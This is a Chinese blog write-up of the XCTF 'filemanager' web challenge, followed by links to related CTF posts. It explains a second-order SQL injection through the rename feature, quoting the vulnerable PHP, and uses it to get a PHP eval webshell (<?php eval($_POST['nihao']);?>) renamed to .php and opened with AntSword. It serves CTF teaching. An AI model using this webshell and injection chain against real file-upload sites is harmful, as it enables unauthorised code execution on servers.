攻防世界 WEB filemanager

最新推荐文章于 2024-06-01 16:50:01 发布
最新推荐文章于 2024-06-01 16:50:01 发布
阅读量1k 收藏
点赞数
分类专栏: 攻防世界 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/120515971
版权

这题有源码泄露,先扫一波,dirsearch -u http://111.200.241.244:58290/
扫出来var.www.gz,下下来分析,直接上有错误的sql注入点吧,在rename.php里面,在rename的时候并没有对文件后缀进行检验,特殊字符也没有过滤,那么这里就是注入点

if ($result) {

		$req['newname'] = basename($req['newname']);
		$re = $db->query("update `file` set `filename`='{$req['newname']}', `oldname`='{$result['filename']}' where `fid`={$result['fid']}");
		if (!$re) {
			print_r($db->error);
			exit;
		}
		$oldname = UPLOAD_DIR . $result["filename"] . $result["extension"];
		$newname = UPLOAD_DIR . $req["newname"] . $result["extension"];
		if (file_exists($oldname)) {
			rename($oldname, $newname);
		}
		$url = "/" . $newname;
		echo "Your file is rename, url:
                <a href=\"{$url}\" target='_blank'>{$url}</a><br/>
                <a href=\"/\">go back</a>";
	}

upload.php
sql语句进行了addslashes(),sql语句

$sql = "select * from `file` where `filename`='{$path_parts['filename']}' and `extension`='{$path_parts['extension']}'";

下面开始分析
首先上传一个空的后缀名为jpg的文件,由于有数据库的结构,我们带一个extension进去’,extension=’.jpg
这样在上传的时候就可以过过滤,然后进行rename,将’,extension=’,替换成upload.jpg,执行了

update `file` set `filename`='{$req['newname']}', `oldname`='{$result['filename']}' where `fid`={$result['fid']}

相当于执行了

update `file` set `filename`='upload.jpg', `oldname`='',extension='' where `fid`={$result['fid']}

那么原来的’,extension=’.jpg相当于变为了upload.jpg.jpg(实际上),upload.jpg是他的文件名,其实这里数据库里extension已经变为空了(数据库里filename存的是upload.jpg,extension是空),而upload文件夹里却还是upload.jpg.jpg文件
然后就是再上传一个一句话<?php eval($_POST['nihao']);?>,命名为upload.jpg,此时这个文件是有后缀的.jpg,文件名是upload
然后最后一步,把文件名为upload.jpg变为upload.php,由于之前数据库里我们已经把extension变为空了,所以oldname匹配到是我们上传木马的文件,而不是原来的文件,具体过程结合源码想一下就明白了
所以最后蚁剑就好
参考视频链接:https://www.bilibili.com/video/BV1XP4y1h7qk?spm_id_from=333.999.0.0

显哥无敌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
攻防世界 web高手进阶区 8分 filemanager
闵行小鱼塘
10-04 1136
继续ctf的旅程,开始攻防世界web高手进阶区的8分,本文是filemanager的writeup
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此详细解博客:https://danbaku.blog.csdn.net/article/details/127951997
【愚公系列】2023年06月 攻防世界-Webfilemanager
时光隧道
06-20 7154
如果PHP源码泄露,那么攻击者可以轻易地查看其中的代码并发现其中的漏洞和安全弱点。这可能导致攻击者能够从中获得敏感信息或者对网站进行攻击。以下是一些可以避免PHP源码泄露的建议:保护PHP源码文件:确保PHP源代码文件存储在一个安全的目录中,并且不能被通过URL访问。最好的方法是将代码文件存储在Web服务器的非公共目录中。禁止目录浏览:在Web服务器上,确保禁止目录浏览功能。这意味着攻击者不能通过URL访问网站上的任何文件和目录。防止PHP错误输出:确保禁用PHP错误输出功能。
攻防世界-WEB-filemanager
最新发布
m0_52061428的博客
06-01 938
人道是,我心错付情深处,以为两情皆如初。奈何春风扶柳意,独我梦中空自舞。许久未见诸位,这段时间由于学业与其他事情,便没再继续写下去(其实很大一部分归咎于自己的懒惰//DOGE)这次带来一道开胃小菜,希望能够帮到各位师傅们,也希望得到大家的指点。
攻防世界--fileclude && fileinclude && inget && easytornado
08-25 2233
file2中包含数据file_get_contents。直接访问flag.php只显示WRONG WAY!说明flag应该在flag.php的注释里。file2使用php伪协议传数据。两个参数file1和file2。
攻防世界-file_include
m0_49025459的博客
12-18 6909
对于我这种编码能力差的小白,我直接就是一个一个手测,然后呢,发现?filename=php://filter//convert.iconv.SJIS*.UCS-4*/resource=check.php好使,但是没有flag。读我们发现我们需要去读取./check.php中的数据,我们尝试用伪协议进行读取,接下来构造payload。文件包含漏洞也是一种“注入型漏洞”,其本质就是输入一段用户能够控制的脚本或者代码,并让服务器端执行。通过阅读php代码,我们明显的可以发现,这个一个文件包含的类型
filemanager攻防世界web进阶 ctf
wuyaowangchuan的博客
11-29 1601
进入环境 看样子是文件上传 扫描目录 /www.tar.gz可以获得源码 先来代码审计 数据结构 T NAMES utf8; SET FOREIGN_KEY_CHECKS = 0; DROP DATABASE IF EXISTS `xdctf`; CREATE DATABASE xdctf; USE xdctf; DROP TABLE IF EXISTS `file`; CREATE TABLE `file` ( `fid` int(10) unsigned NOT NULL AUTO_IN.
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此详细解博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此详细解博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界Fakezip杂项
11-20
攻防世界Fakezip杂项】是一道网络安全领域中的挑战,属于攻防世界的Misc类问。Misc( Miscellaneous)通常指的是涉及多种技术、需要综合运用知识的目,这道目的核心在于理解和处理压缩文件,特别是涉及到...
攻防世界running
11-15
攻防世界running杂项,misc。 此详细解博客:https://blog.csdn.net/m0_59188912/article/details/127861757
xdctf2015前20名writeup
10-07
2015年xdctf前20名的writeup,绝对不坑
caddy_web服务器(添加filemanager版本)
01-14
不知道为什么 caddy web 服务器官网把 filemanager 插件干掉了,这是我之前下载的Linux 64位环境下只带 filemanager 插件的版本,自己一直在用这个,感觉很方便,希望对大家有帮助; 版本号:caddy_v0.11.1_linux_amd64_custom_personal; 对应博客地址:https://blog.csdn.net/TMT123421/article/details/82740660;
攻防世界--filemanager
qq_46263951的博客
01-05 1268
看到这里猜测是个文件上传漏洞,测试几次发现好像只能上传图片,rename只能更改文件名,但无法更改后缀。 随手扫了一下发现源码泄漏, 审阅rename代码 <?php /** * Created by PhpStorm. * User: phithon * Date: 15/10/14 * Time: 下午9:39 */ require_once "common.inc.php"; if (isset($req['oldname']) && isset..
攻防世界 web进阶区 filemanger
m0_51395584的博客
06-14 1004
攻防世界 filemanger 文件上传 木马后门
攻防世界-fileclude
m0_49025459的博客
12-28 1172
访问目场景阅读php代码构造payload,这里文件包含的file1使用的是php伪函数进行传输的,file2使用的data://text/plain进行内容的传入。
Webmin -- File Manager模块
yuyuyuliang00的博客
08-22 402
linux webmin File manager
攻防世界web fileclude
07-27
攻防世界中的文件包含漏洞(File Inclusion Vulnerability)是一种常见的web安全漏洞。它主要出现在web应用程序中,当应用程序动态包含用户可控制的文件时,如果没有正确过滤和验证用户输入,攻击者可以利用这个漏洞执行恶意代码或读取敏感文件。 文件包含漏洞分为本地文件包含(Local File Inclusion,LFI)和远程文件包含(Remote File Inclusion,RFI)两种类型。LFI漏洞发生在应用程序尝试包含本地文件时,而RFI漏洞则允许攻击者通过远程服务器包含外部文件。 为了防止文件包含漏洞,开发人员应该遵循以下最佳实践: 1. 永远不要信任用户输入。对用户提供的文件名、路径或URL进行严格的输入验证和过滤。 2. 使用白名单机制限制可包含的文件范围。只允许应用程序包含预定义的合法文件,而不是用户可控制的任意文件。 3. 避免使用动态包含,尽量使用静态包含。如果必须使用动态包含,确保只包含可信任的文件。 4. 对于本地文件包含漏洞,限制访问文件系统的权限。确保应用程序只能访问必要的文件,并将敏感文件放在可访问性受限的目录下。 5. 对于远程文件包含漏洞,禁止从远程服务器包含文件,或者使用安全的方法验证和限制远程文件的来源。 6. 定期更新和修补应用程序的漏洞,以确保及时修复已知的文件包含漏洞和其他安全。 这些是一些常见的防范文件包含漏洞的方法,但在实际开发过程中,还需要根据具体情况采取其他安全措施来保护应用程序免受攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值